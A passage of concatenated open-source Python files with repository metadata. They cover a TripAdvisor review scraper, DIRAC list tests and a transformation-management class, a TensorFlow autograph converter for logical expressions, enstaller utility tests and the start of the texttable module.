               'biz_member_id',
               'username',
               'review_title',
               'review_rating',
               'review_text',
               'review_date']
    collected = pd.DataFrame(columns=columns)

    page = 1
    more_reviews = True
    while more_reviews:
        print('*'*50)
        print('Now on page {}'.format(page))
        #print('*'*50)
        page_df = pd.DataFrame(columns=columns)
        ret = return_results(url, page, br)
        #print(ret['locs'])
        #print(ret['ttls'])
        page_df['biz_review_id'] = ret['revids']
        page_df['biz_member_id'] = ret['mmbrids']
        page_df['username'] = ret['usrnms']
        page_df['review_title'] = ret['ttls']
        page_df['review_rating'] = ret['rtngs']
        page_df['review_date'] = ret['dts']
        page_df['review_text'] = ret['rvws']
        # carry forward pagination state returned by return_results
        url = ret['url']
        more_reviews = ret['more_reviews']
        page = ret['page']
        print('successfully completed page {}'.format(page))
        collected = collected.append(page_df)
    return collected
def splinter_scrape_ta_reviews(city='', state='', write_to_db=False, start_num=0, end_num=-1):
    """Scrape TripAdvisor reviews for every hotel in a city.

    :param str city: city name with underscores for spaces (e.g. 'new_haven').
    :param str state: state abbreviation (e.g. 'ct').
    :param bool write_to_db: if True, append scraped reviews to ta_reviews.
    :param int start_num: index of the first hotel to scrape (0-based).
    :param int end_num: index one past the last hotel to scrape; -1 means
        scrape through the end of the list.
    """
    engine = cadb.connect_aws_db(write_unicode=True)
    blinks = get_hotel_urls(city, state, engine)
    # only do the specified hotel range
    if start_num != 0:
        blinks = blinks[start_num:]
    if end_num != -1:
        if len(blinks) < end_num:
            print('end_num exceeded number of hotels. resetting to max.')
            end_num = len(blinks)
        blinks = blinks[:end_num]
    br = Browser()
    donebids = get_done_business_ids(city, engine)
    for hotel_id, biz_id, link in blinks:
        # skip hotels whose reviews were already scraped
        if int(biz_id) not in donebids:
            bigdf = scrape_hotel(link, br, engine)
            bigdf['hotel_id'] = hotel_id
            bigdf['business_id'] = biz_id
            bigdf['biz_review_id'] = np.int64(bigdf['biz_review_id'].values)
            bigdf = remove_duplicates(bigdf, city, engine)
            if write_to_db:
                try:
                    bigdf.to_sql('ta_reviews', engine, if_exists='append', index=False)
                except Exception as err:
                    # was a bare `except:` that hid the failure cause
                    print('WRITING TO DB FAILED!!!')
                    print(err)
        else:
            print('business_id {} already scraped.'.format(biz_id))
if __name__ == '__main__':
    # Command-line entry point for the scraper.
    parser = argparse.ArgumentParser(
        description='argparse object.')
    parser.add_argument(
        '--city_url',
        help='The url of the city to scrape.',
        nargs='?', default='')
    parser.add_argument(
        '-c', '--city',
        # fixed: this flag takes a city *name*, not a url
        help='The name of the city to scrape.',
        nargs='?', default='')
    parser.add_argument(
        '-s', '--state',
        # fixed typo: "This name" -> "The name"
        help='The name of the state to scrape.',
        nargs='?', default='')
    parser.add_argument(
        '--start_num',
        help='The starting number within the list of hotels for a city ' +
        'to start with. For example, if there are ten hotels for the city, ' +
        'and you only want to add reviews for hotels 5 through 10, set ' +
        'start_num to 5.',
        nargs='?', default=0)
    parser.add_argument(
        '--end_num',
        help='The ending number within the list of hotels for a city. ' +
        'For example, if there are ten hotels for the city, ' +
        'and you only want to add reviews for hotels 0 through 4, set ' +
        'end_num to 5.',
        nargs='?', default=-1)
    parser.add_argument(
        '-w', '--write_to_db',
        help='Set if you want to write the results to the DB.',
        default=False, action='store_true')
    if len(sys.argv) > 11:
        print('use the command')
        # fixed: usage message previously referenced the wrong script name
        print('python splinter_scrape_ta_reviews.py -c city -s state')
        print('For example:')
        print('python splinter_scrape_ta_reviews.py -c new_haven -s ct')
        sys.exit(2)
    args = parser.parse_args()
    splinter_scrape_ta_reviews(city=args.city,
                               state=args.state,
                               write_to_db=args.write_to_db,
                               start_num=int(args.start_num),
                               end_num=int(args.end_num))
|
mattgiguere/doglodge
|
code/splinter_scrape_ta_reviews.py
|
Python
|
mit
| 10,631
|
[
"VisIt"
] |
d3a28c7b1d77da51a192063e17386b0f0467c28fbf203a8c6ecd95b53c3e06a0
|
########################################################################
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2011/01/17 08:17:58
########################################################################
""".. module:: ListTestCase
Test cases for DIRAC.Core.Utilities.List module.
"""
import unittest
# sut
from DIRAC.Core.Utilities import List
########################################################################
class ListTestCase(unittest.TestCase):
    """py:class ListTestCase

    Test case for DIRAC.Core.Utilities.List module.
    """

    def testUniqueElements(self):
        """uniqueElements tests"""
        # empty list
        aList = []
        self.assertEqual(List.uniqueElements(aList), [])
        # redundant elements
        aList = [1, 1, 2, 3]
        self.assertEqual(List.uniqueElements(aList), [1, 2, 3])

    def testAppendUnique(self):
        """appendUnique tests"""
        # empty
        aList = []
        List.appendUnique(aList, None)
        self.assertEqual(aList, [None])
        # redundant element
        aList = [1, 2, 3]
        List.appendUnique(aList, 1)
        self.assertEqual(aList, [1, 2, 3])
        # all unique
        aList = [1, 2]
        List.appendUnique(aList, 3)
        self.assertEqual(aList, [1, 2, 3])

    def testRandomize(self):
        """randomize tests"""
        # empty list
        aList = []
        randList = List.randomize(aList)
        self.assertEqual(randList, [])
        # non empty: same elements, possibly different order
        aList = ["1", "2", "3"]
        randList = List.randomize(aList)
        self.assertEqual(len(aList), len(randList))
        for x in aList:
            self.assertEqual(x in randList, True)
        for x in randList:
            self.assertEqual(x in aList, True)

    def testPop(self):
        """pop tests"""
        # empty list
        aList = []
        x = List.pop(aList, 1)
        self.assertEqual(aList, [])
        self.assertEqual(x, None)
        # pop
        aList = [1, 2, 3]
        x = List.pop(aList, 2)
        self.assertEqual(x, 2)
        self.assertEqual(aList, [1, 3])

    def testStringListToString(self):
        """stringListToString tests"""
        # empty list
        aList = []
        aStr = List.stringListToString(aList)
        self.assertEqual(aStr, "")
        # not string elements (should it raise an exception???)
        aList = ["a", 1]
        aStr = List.stringListToString(aList)
        self.assertEqual(aStr, "'a','1'")
        # normal list
        aList = ["a", "b", "c"]
        aStr = List.stringListToString(aList)
        self.assertEqual(aStr, "'a','b','c'")

    def testIntListToString(self):
        """intListToString"""
        # empty list
        aList = []
        aStr = List.intListToString(aList)
        self.assertEqual(aStr, "")
        # int list
        aList = [1, 2, 3]
        aStr = List.intListToString(aList)
        self.assertEqual(aStr, "1,2,3")
        # mixture elements (should it raise an exception???)
        aList = ["1", 2, 3]
        aStr = List.intListToString(aList)
        self.assertEqual(aStr, "1,2,3")

    def testFromChar(self):
        """fromChar tests"""
        # empty string
        aStr = ""
        self.assertEqual(List.fromChar(aStr, "-"), [])
        # wrong sep (should it raise an exception???)
        aStr = "a:b:c"
        self.assertEqual(List.fromChar(aStr, "-"), ["a:b:c"])
        # normal behavior
        aStr = "a:b:c"
        self.assertEqual(List.fromChar(aStr, ":"), ["a", "b", "c"])
        # only sep
        aStr = ","
        self.assertEqual(List.fromChar(aStr, ","), [])
        # too many separators
        aStr = "a,,b,,c,,,"
        self.assertEqual(List.fromChar(aStr, ","), ["a", "b", "c"])

    def testBreakListIntoChunks(self):
        """breakListIntoChunks tests"""
        # empty list
        aList = []
        self.assertEqual(List.breakListIntoChunks(aList, 5), [])
        # negative chunk size must raise; the old try/except pattern
        # passed silently when no exception was raised at all.
        with self.assertRaises(RuntimeError) as exc:
            List.breakListIntoChunks([], -2)
        self.assertEqual(str(exc.exception), "chunkSize cannot be less than 1")
        # normal behavior
        aList = list(range(10))
        self.assertEqual(List.breakListIntoChunks(aList, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]])
        # and once again this time with a rest
        aList = list(range(10))
        self.assertEqual(List.breakListIntoChunks(aList, 4), [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]])
        # almost empty list, too many chunks
        aList = [1]
        self.assertEqual(List.breakListIntoChunks(aList, 2), [[1]])
# test suite execution: run the ListTestCase suite verbosely when this
# file is executed directly (rather than collected by a test runner).
if __name__ == "__main__":
    TESTLOADER = unittest.TestLoader()
    SUITE = TESTLOADER.loadTestsFromTestCase(ListTestCase)
    unittest.TextTestRunner(verbosity=3).run(SUITE)
|
DIRACGrid/DIRAC
|
src/DIRAC/Core/Utilities/test/Test_List.py
|
Python
|
gpl-3.0
| 4,847
|
[
"DIRAC"
] |
59953cce689b15ea51f1970d0f08cb9f0bdfe13313321a458bc2659a383de6a2
|
"""TransformationInfo class to be used by ILCTransformation System"""
from collections import OrderedDict, defaultdict
from itertools import izip_longest
from DIRAC import gLogger, S_OK
from DIRAC.Core.Utilities.List import breakListIntoChunks
from DIRAC.Core.Utilities.Proxy import UserProxy
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.TransformationSystem.Utilities.JobInfo import JobInfo
from DIRAC.WorkloadManagementSystem.Client.JobStateUpdateClient import JobStateUpdateClient
__RCSID__ = "$Id$"
class TransformationInfo(object):
    """Hold information about a transformation.

    Bundles the DIRAC clients needed to inspect and repair a single
    transformation: task status, job status, input-file status and
    output-file cleanup. When ``enabled`` is False, state-changing
    helpers are no-ops (dry-run mode).
    """

    def __init__(self, transformationID, transInfoDict, enabled,
                 tClient, fcClient, jobMon):
        """Store clients etc."""
        self.log = gLogger.getSubLogger(__name__ + "[%s]" % transformationID)
        # enabled=False -> dry-run: mutating calls return without effect
        self.enabled = enabled
        self.tID = transformationID
        self.transName = transInfoDict['TransformationName']
        self.tClient = tClient
        self.jobMon = jobMon
        self.fcClient = fcClient
        self.transType = transInfoDict['Type']
        # author credentials: used to obtain a proxy for file removal
        # in cleanOutputs()
        self.authorDN = transInfoDict['AuthorDN']
        self.authorGroup = transInfoDict['AuthorGroup']
        self.jobStateClient = JobStateUpdateClient()

    def checkTasksStatus(self):
        """Check the status for the task of given transformation and taskID.

        :returns: dict mapping taskID -> list of file dicts with keys
            FileID, LFN, Status, ErrorCount
        :raises RuntimeError: if the transformation files cannot be fetched
        """
        res = self.tClient.getTransformationFiles(condDict={'TransformationID': self.tID})
        if not res['OK']:
            raise RuntimeError("Failed to get transformation tasks: %s" % res['Message'])
        tasksDict = defaultdict(list)
        for task in res['Value']:
            taskID = task['TaskID']
            lfn = task['LFN']
            status = task['Status']
            fileID = task['FileID']
            errorCount = task['ErrorCount']
            tasksDict[taskID].append(dict(FileID=fileID, LFN=lfn, Status=status, ErrorCount=errorCount))
        return tasksDict

    def setJobDone(self, job):
        """Set the task to Done and force the job to Done if needed."""
        if not self.enabled:
            return
        self.__setTaskStatus(job, 'Done')
        if job.status != 'Done':
            self.__updateJobStatus(job.jobID, 'Done', "Job forced to Done")

    def setJobFailed(self, job):
        """Set the task to Failed and force the job to Failed if needed."""
        if not self.enabled:
            return
        self.__setTaskStatus(job, 'Failed')
        if job.status != 'Failed':
            self.__updateJobStatus(job.jobID, "Failed", "Job forced to Failed")

    def setInputUnused(self, job):
        """Set the inputfiles to Unused."""
        self.__setInputStatus(job, 'Unused')

    def setInputMaxReset(self, job):
        """Set the inputfile to MaxReset."""
        self.__setInputStatus(job, "MaxReset")

    def setInputProcessed(self, job):
        """Set the inputfile to Processed."""
        self.__setInputStatus(job, "Processed")

    def setInputDeleted(self, job):
        """Set the inputfile to Deleted."""
        self.__setInputStatus(job, "Deleted")

    def __setInputStatus(self, job, status):
        """Set the input file to status.

        No-op in dry-run mode.
        :raises RuntimeError: if the status update fails
        """
        if self.enabled:
            result = self.tClient.setFileStatusForTransformation(self.tID, status, job.inputFiles, force=True)
            if not result['OK']:
                gLogger.error("Failed updating status", result['Message'])
                raise RuntimeError("Failed updating file status")

    def __setTaskStatus(self, job, status):
        """Update the task in the TransformationDB.

        :raises RuntimeError: if the task status update fails
        """
        taskID = job.taskID
        res = self.tClient.setTaskStatus(self.transName, taskID, status)
        if not res['OK']:
            raise RuntimeError("Failed updating task status: %s" % res['Message'])

    def __updateJobStatus(self, jobID, status, minorstatus=''):
        """Update the job status.

        Returns S_OK('DisabledMode') without contacting the service in
        dry-run mode.
        :raises RuntimeError: if the job status update fails
        """
        if self.enabled:
            source = 'DataRecoveryAgent'
            result = self.jobStateClient.setJobStatus(jobID, status, minorstatus, source)
        else:
            return S_OK('DisabledMode')
        if not result['OK']:
            self.log.error('Failed to update job status', result['Message'])
            raise RuntimeError('Failed to update job status')
        return result

    def __findAllDescendants(self, lfnList):
        """Find all descendants of a list of LFNs.

        Searches up to 7 generations deep. Best effort: returns an empty
        list if the catalog query fails.
        """
        allDescendants = []
        result = self.fcClient.getFileDescendents(lfnList, range(1, 8))
        if not result['OK']:
            return allDescendants
        for dummy_lfn, descendants in result['Value']['Successful'].items():
            allDescendants.extend(descendants)
        return allDescendants

    def cleanOutputs(self, jobInfo):
        """Remove all job outputs for job represented by jobInfo object.

        Including removal of descendents, if defined. In dry-run mode only
        logs what would be removed.
        """
        if len(jobInfo.outputFiles) == 0:
            return
        descendants = self.__findAllDescendants(jobInfo.outputFiles)
        # keep only the outputs whose catalog status says they exist
        existingOutputFiles = [
            lfn for lfn,
            status in izip_longest(
                jobInfo.outputFiles,
                jobInfo.outputFileStatus) if status == "Exists"]
        filesToDelete = existingOutputFiles + descendants
        if not filesToDelete:
            return
        if not self.enabled:
            self.log.notice("Would have removed these files: \n +++ %s " % "\n +++ ".join(filesToDelete))
            return
        self.log.notice("Remove these files: \n +++ %s " % "\n +++ ".join(filesToDelete))
        errorReasons = defaultdict(list)
        successfullyRemoved = 0
        # remove in chunks of 200 under the transformation author's proxy
        for lfnList in breakListIntoChunks(filesToDelete, 200):
            with UserProxy(proxyUserDN=self.authorDN, proxyUserGroup=self.authorGroup) as proxyResult:
                if not proxyResult['OK']:
                    raise RuntimeError('Failed to get a proxy: %s' % proxyResult['Message'])
                result = DataManager().removeFile(lfnList)
                if not result['OK']:
                    self.log.error("Failed to remove LFNs", result['Message'])
                    raise RuntimeError("Failed to remove LFNs: %s" % result['Message'])
                for lfn, err in result['Value']['Failed'].items():
                    reason = str(err)
                    errorReasons[reason].append(lfn)
                successfullyRemoved += len(result['Value']['Successful'].keys())
        for reason, lfns in errorReasons.items():
            self.log.error("Failed to remove %d files with error: %s" % (len(lfns), reason))
        self.log.notice("Successfully removed %d files" % successfullyRemoved)

    def getJobs(self, statusList=None):
        """Get done and failed jobs.

        :param list statusList: optional list of status to find jobs
        :returns: 3-tuple of OrderedDict of JobInfo objects, keyed by jobID;
            number of Done jobs; number of Failed jobs
        """
        done = S_OK([])
        failed = S_OK([])
        if statusList is None:
            statusList = ['Done', 'Failed']
        if 'Done' in statusList:
            self.log.notice("Getting 'Done' Jobs...")
            done = self.__getJobs(["Done"])
        if 'Failed' in statusList:
            self.log.notice("Getting 'Failed' Jobs...")
            failed = self.__getJobs(["Failed"])
        done = done['Value']
        failed = failed['Value']
        jobsUnsorted = {}
        for job in done:
            jobsUnsorted[int(job)] = JobInfo(job, "Done", self.tID, self.transType)
        for job in failed:
            jobsUnsorted[int(job)] = JobInfo(job, "Failed", self.tID, self.transType)
        # sort by jobID so callers iterate in ascending job order
        jobs = OrderedDict(sorted(jobsUnsorted.items(), key=lambda t: t[0]))
        self.log.notice("Found %d Done Jobs " % len(done))
        self.log.notice("Found %d Failed Jobs " % len(failed))
        return jobs, len(done), len(failed)

    def __getJobs(self, status):
        """Return list of jobs with given status.

        :param list status: list of status to find
        :returns: S_OK with result
        :raises: RuntimeError when failing to find jobs
        """
        # jobs of a transformation carry the zero-padded tID as JobGroup
        attrDict = dict(Status=status, JobGroup='%08d' % int(self.tID))
        res = self.jobMon.getJobs(attrDict)
        if res['OK']:
            self.log.debug('Found Trans jobs: %s' % res['Value'])
            return res
        else:
            self.log.error('Error finding jobs: ', res['Message'])
            raise RuntimeError('Failed to get jobs')
|
fstagni/DIRAC
|
TransformationSystem/Utilities/TransformationInfo.py
|
Python
|
gpl-3.0
| 7,716
|
[
"DIRAC"
] |
f3156a26e389e31a96a02db72700bbd1113cbca0d4b528191692d6fb706eb597
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converter for logical expressions, e.g. `a and b -> tf.logical_and(a, b)`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import templates
# TODO(mdan): Properly extract boolean ops according to lazy eval rules.
# Note that this isn't completely safe either, because tensors may have control
# dependencies.
# Note that for loops that should be done after the loop was converted to
# tf.while_loop so that the expanded conditionals are properly scoped.
# Used to signal that an operand is safe for non-lazy evaluation.
SAFE_BOOLEAN_OPERAND = 'SAFE_BOOLEAN_OPERAND'
LOGICAL_OPERATORS = {
gast.And: 'ag__.and_',
gast.Not: 'ag__.not_',
gast.Or: 'ag__.or_',
}
EQUALITY_OPERATORS = {
gast.Eq: 'ag__.eq',
gast.NotEq: 'ag__.not_eq',
}
class LogicalExpressionTransformer(converter.Base):
    """Converts logical expressions to corresponding TF calls."""

    def _overload_of(self, operator):
        # Return the autograph overload name for this operator node, or
        # None when the operator must be left as plain Python syntax.
        op_type = type(operator)
        if op_type in LOGICAL_OPERATORS:
            return LOGICAL_OPERATORS[op_type]
        if self.ctx.program.options.uses(converter.Feature.EQUALITY_OPERATORS):
            if op_type in EQUALITY_OPERATORS:
                return EQUALITY_OPERATORS[op_type]
        return None

    def _as_lambda(self, expr):
        # Wrap expr in a thunk so the overloads can evaluate operands
        # lazily (preserving short-circuit semantics).
        return templates.replace_as_expression('lambda: expr', expr=expr)

    def _as_binary_function(self, func_name, arg1, arg2):
        # Build the AST for `func_name(arg1, arg2)`.
        return templates.replace_as_expression(
            'func_name(arg1, arg2)',
            func_name=parser.parse_expression(func_name),
            arg1=arg1,
            arg2=arg2)

    def _as_binary_operation(self, op, arg1, arg2):
        # `is` is only a placeholder comparison: its operator node is
        # replaced with the original op below.
        template = templates.replace_as_expression(
            'arg1 is arg2',
            arg1=arg1,
            arg2=arg2)
        template.ops[0] = op
        return template

    def _as_unary_function(self, func_name, arg):
        # Build the AST for `func_name(arg)`.
        return templates.replace_as_expression(
            'func_name(arg)', func_name=parser.parse_expression(func_name), arg=arg)

    def visit_Compare(self, node):
        node = self.generic_visit(node)
        # Without the EQUALITY_OPERATORS feature, comparisons stay as-is.
        if (not self.ctx.program.options.uses(
                converter.Feature.EQUALITY_OPERATORS)):
            return node
        ops_and_comps = list(zip(node.ops, node.comparators))
        left = node.left
        # Repeated comparisons are converted to conjunctions:
        # a < b < c -> a < b and b < c
        op_tree = None
        while ops_and_comps:
            op, right = ops_and_comps.pop(0)
            overload = self._overload_of(op)
            if overload is not None:
                binary_comparison = self._as_binary_function(overload, left, right)
            else:
                # operator has no overload: keep it as a native comparison
                binary_comparison = self._as_binary_operation(op, left, right)
            if op_tree is not None:
                # chain successive comparisons with a lazy and_
                op_tree = self._as_binary_function('ag__.and_',
                                                   self._as_lambda(op_tree),
                                                   self._as_lambda(binary_comparison))
            else:
                op_tree = binary_comparison
            left = right
        assert op_tree is not None
        return op_tree

    def visit_UnaryOp(self, node):
        node = self.generic_visit(node)
        overload = self._overload_of(node.op)
        if overload is None:
            return node
        return self._as_unary_function(overload, node.operand)

    def visit_BoolOp(self, node):
        node = self.generic_visit(node)
        node_values = node.values
        # Fold right-to-left so the rightmost operands end up innermost,
        # each wrapped in a lambda for lazy evaluation.
        right = node.values.pop()
        while node_values:
            left = node_values.pop()
            right = self._as_binary_function(
                self._overload_of(node.op), self._as_lambda(left),
                self._as_lambda(right))
        return right
def transform(node, ctx):
    """Apply the logical-expression conversion to *node* and return it."""
    return LogicalExpressionTransformer(ctx).visit(node)
|
xzturn/tensorflow
|
tensorflow/python/autograph/converters/logical_expressions.py
|
Python
|
apache-2.0
| 4,499
|
[
"VisIt"
] |
3cbbc225bb693eba99268e0b99163d3b79b1f7407c86bb0e3cd8fdce7265d3c6
|
import random
import unittest
from egginst.main import name_version_fn
from enstaller.utils import canonical, cname_fn, comparable_version
class TestUtils(unittest.TestCase):
    """Unit tests for enstaller.utils helpers and egg-name parsing."""

    def test_canonical(self):
        cases = [
            ('NumPy', 'numpy'),
            ('MySql-python', 'mysql_python'),
            ('Python-dateutil', 'python_dateutil'),
        ]
        for raw_name, expected in cases:
            self.assertEqual(canonical(raw_name), expected)

    def test_cname_fn(self):
        self.assertEqual(cname_fn('VTK-5.4.2-1.egg'), 'vtk')

    def test_naming(self):
        cases = [
            ('NumPy-1.5-py2.6-win32.egg', 'NumPy', '1.5-py2.6-win32', 'numpy'),
            ('NumPy-1.5-2.egg', 'NumPy', '1.5-2', 'numpy'),
            ('NumPy-1.5.egg', 'NumPy', '1.5', 'numpy'),
        ]
        for egg_fn, exp_name, exp_ver, exp_cname in cases:
            self.assertEqual(name_version_fn(egg_fn), (exp_name, exp_ver))
            self.assertEqual(cname_fn(egg_fn), exp_cname)
            self.assertEqual(canonical(exp_name), exp_cname)

    def test_comparable_version(self):
        # each list is already in the expected ascending version order;
        # shuffling then sorting with the key must restore that order
        ordered_lists = (
            ['1.0.4', '1.2.1', '1.3.0b1', '1.3.0', '1.3.10',
             '1.3.11.dev7', '1.3.11.dev12', '1.3.11.dev111',
             '1.3.11', '1.3.143',
             '1.4.0.dev7749', '1.4.0rc1', '1.4.0rc2', '1.4.0'],
            ['2008j', '2008k', '2009b', '2009h', '2010b'],
            ['0.99', '1.0a2', '1.0b1', '1.0rc1', '1.0', '1.0.1'],
            ['2.0.8', '2.0.10', '2.0.10.1', '2.0.11'],
            ['0.10.1', '0.10.2', '0.11.dev1324', '0.11'],
        )
        for expected_order in ordered_lists:
            shuffled = list(expected_order)
            random.shuffle(shuffled)
            shuffled.sort(key=comparable_version)
            self.assertEqual(shuffled, expected_order)
# run the test suite when executed directly
if __name__ == '__main__':
    unittest.main()
|
jwiggins/keyenst
|
tests/test_utils.py
|
Python
|
bsd-3-clause
| 1,722
|
[
"VTK"
] |
43095e5148a6fb1fc33bfd0f2cd4466333e255004621d3abafd2ca60cb088d28
|
#!/usr/bin/env python
#
# texttable - module for creating simple ASCII tables
# Copyright (C) 2003-2011 Gerome Fournier <jef(at)foutaise.org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# NOTE: This is external code.
# We don't do automatic Eclipse PyDev code analysis for it.
#@PydevCodeAnalysisIgnore
"""module for creating simple ASCII tables
Example:
table = TextTable()
table.set_cols_align(["l", "r", "c"])
table.set_cols_valign(["t", "m", "b"])
table.add_rows([ ["Name", "Age", "Nickname"],
["Mr\\nXavier\\nHuon", 32, "Xav'"],
["Mr\\nBaptiste\\nClement", 1, "Baby"] ])
print table.draw() + "\\n"
table = TextTable()
table.set_deco(TextTable.HEADER)
table.set_cols_dtype(['t', # text
'f', # float (decimal)
'e', # float (exponent)
'i', # integer
'a']) # automatic
table.set_cols_align(["l", "r", "r", "r", "l"])
table.add_rows([["text", "float", "exp", "int", "auto"],
["abcd", "67", 654, 89, 128.001],
["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
print table.draw()
Result:
+----------+-----+----------+
| Name | Age | Nickname |
+==========+=====+==========+
| Mr | | |
| Xavier | 32 | |
| Huon | | Xav' |
+----------+-----+----------+
| Mr | | |
| Baptiste | 1 | |
| Clement | | Baby |
+----------+-----+----------+
text float exp int auto
===========================================
abcd 67.000 6.540e+02 89 128.001
efgh 67.543 6.540e-01 90 1.280e+22
ijkl 0.000 5.000e-78 89 0.000
mnop 0.023 5.000e+78 92 1.280e+22
"""
__all__ = ["TextTable", "ArraySizeError"]
__author__ = 'Gerome Fournier <jef(at)foutaise.org>'
__license__ = 'GPL'
__version__ = '0.8'
__revision__ = '$Id: texttable.py 132 2011-10-02 11:51:00Z jef $'
__credits__ = """\
Jeff Kowalczyk:
- textwrap improved import
- comment concerning header output
Anonymous:
- add_rows method, for adding rows in one go
Sergey Simonenko:
- redefined len() function to deal with non-ASCII characters
Roger Lew:
- columns datatype specifications
Brian Peterson:
- better handling of unicode errors
"""
import sys
import string
try:
if sys.version >= '2.3':
import textwrap
elif sys.version >= '2.2':
from optparse import textwrap
else:
from optik import textwrap
except ImportError:
sys.stderr.write("Can't import textwrap module!\n")
raise
try:
True, False
except NameError:
(True, False) = (1, 0)
def len(iterable):
    """Redefining len here so it will be able to work with non-ASCII characters
    """
    # NOTE(review): deliberately shadows the builtin within this vendored
    # Python 2 module so widths count characters, not UTF-8 bytes.
    if not isinstance(iterable, str):
        return iterable.__len__()
    try:
        # decode as UTF-8; the recursive call takes the non-str branch above
        return len(unicode(iterable, 'utf'))
    except:
        # undecodable byte string: fall back to the raw byte length
        # (bare except kept as-is: vendored external code)
        return iterable.__len__()
class ArraySizeError(Exception):
    """Exception raised when specified rows don't fit the required size
    """

    def __init__(self, msg):
        # keep the message for __str__; pass it to the base class too
        self.msg = msg
        Exception.__init__(self, msg, '')

    def __str__(self):
        return self.msg
class TextTable:
BORDER = 1
HEADER = 1 << 1
HLINES = 1 << 2
VLINES = 1 << 3
def __init__(self, max_width=80):
"""Constructor
- max_width is an integer, specifying the maximum width of the table
- if set to 0, size is unlimited, therefore cells won't be wrapped
"""
if max_width <= 0:
max_width = False
self._max_width = max_width
self._precision = 3
self._deco = TextTable.VLINES | TextTable.HLINES | TextTable.BORDER | \
TextTable.HEADER
self.set_chars(['-', '|', '+', '='])
self.reset()
def reset(self):
"""Reset the instance
- reset rows and header
"""
self._hline_string = None
self._row_size = None
self._header = []
self._rows = []
def set_chars(self, array):
"""Set the characters used to draw lines between rows and columns
- the array should contain 4 fields:
[horizontal, vertical, corner, header]
- default is set to:
['-', '|', '+', '=']
"""
if len(array) != 4:
raise ArraySizeError, "array should contain 4 characters"
array = [ x[:1] for x in [ str(s) for s in array ] ]
(self._char_horiz, self._char_vert,
self._char_corner, self._char_header) = array
def set_deco(self, deco):
"""Set the table decoration
- 'deco' can be a combinaison of:
TextTable.BORDER: Border around the table
TextTable.HEADER: Horizontal line below the header
TextTable.HLINES: Horizontal lines between rows
TextTable.VLINES: Vertical lines between columns
All of them are enabled by default
- example:
TextTable.BORDER | TextTable.HEADER
"""
self._deco = deco
def set_cols_align(self, array):
"""Set the desired columns alignment
- the elements of the array should be either "l", "c" or "r":
* "l": column flushed left
* "c": column centered
* "r": column flushed right
"""
self._check_row_size(array)
self._align = array
def set_cols_valign(self, array):
"""Set the desired columns vertical alignment
- the elements of the array should be either "t", "m" or "b":
* "t": column aligned on the top of the cell
* "m": column aligned on the middle of the cell
* "b": column aligned on the bottom of the cell
"""
self._check_row_size(array)
self._valign = array
def set_cols_dtype(self, array):
"""Set the desired columns datatype for the cols.
- the elements of the array should be either "a", "t", "f", "e" or "i":
* "a": automatic (try to use the most appropriate datatype)
* "t": treat as text
* "f": treat as float in decimal format
* "e": treat as float in exponential format
* "i": treat as int
- by default, automatic datatyping is used for each column
"""
self._check_row_size(array)
self._dtype = array
def set_cols_width(self, array):
"""Set the desired columns width
- the elements of the array should be integers, specifying the
width of each column. For example:
[10, 20, 5]
"""
self._check_row_size(array)
try:
array = map(int, array)
if reduce(min, array) <= 0:
raise ValueError
except ValueError:
sys.stderr.write("Wrong argument in column width specification\n")
raise
self._width = array
def set_precision(self, width):
"""Set the desired precision for float/exponential formats
- width must be an integer >= 0
- default value is set to 3
"""
if not type(width) is int or width < 0:
raise ValueError('width must be an integer greater then 0')
self._precision = width
def header(self, array):
"""Specify the header of the table
"""
self._check_row_size(array)
self._header = map(str, array)
def add_row(self, array):
"""Add a row in the rows stack
- cells can contain newlines and tabs
"""
self._check_row_size(array)
if not hasattr(self, "_dtype"):
self._dtype = ["a"] * self._row_size
cells = []
for i,x in enumerate(array):
cells.append(self._str(i,x))
self._rows.append(cells)
def add_rows(self, rows, header=True):
"""Add several rows in the rows stack
- The 'rows' argument can be either an iterator returning arrays,
or a by-dimensional array
- 'header' specifies if the first row should be used as the header
of the table
"""
# nb: don't use 'iter' on by-dimensional arrays, to get a
# usable code for python 2.1
if header:
if hasattr(rows, '__iter__') and hasattr(rows, 'next'):
self.header(rows.next())
else:
self.header(rows[0])
rows = rows[1:]
for row in rows:
self.add_row(row)
def draw(self):
"""Draw the table
- the table is returned as a whole string
"""
if not self._header and not self._rows:
return
self._compute_cols_width()
self._check_align()
out = ""
if self._has_border():
out += self._hline()
if self._header:
out += self._draw_line(self._header, isheader=True)
if self._has_header():
out += self._hline_header()
length = 0
for row in self._rows:
length += 1
out += self._draw_line(row)
if self._has_hlines() and length < len(self._rows):
out += self._hline()
if self._has_border():
out += self._hline()
return out[:-1]
def _str(self, i, x):
"""Handles string formatting of cell data
i - index of the cell datatype in self._dtype
x - cell data to format
"""
try:
f = float(x)
except:
return str(x)
n = self._precision
dtype = self._dtype[i]
if dtype == 'i':
return str(int(round(f)))
elif dtype == 'f':
return '%.*f' % (n, f)
elif dtype == 'e':
return '%.*e' % (n, f)
elif dtype == 't':
return str(x)
else:
if f - round(f) == 0:
if abs(f) > 1e8:
return '%.*e' % (n, f)
else:
return str(int(round(f)))
else:
if abs(f) > 1e8:
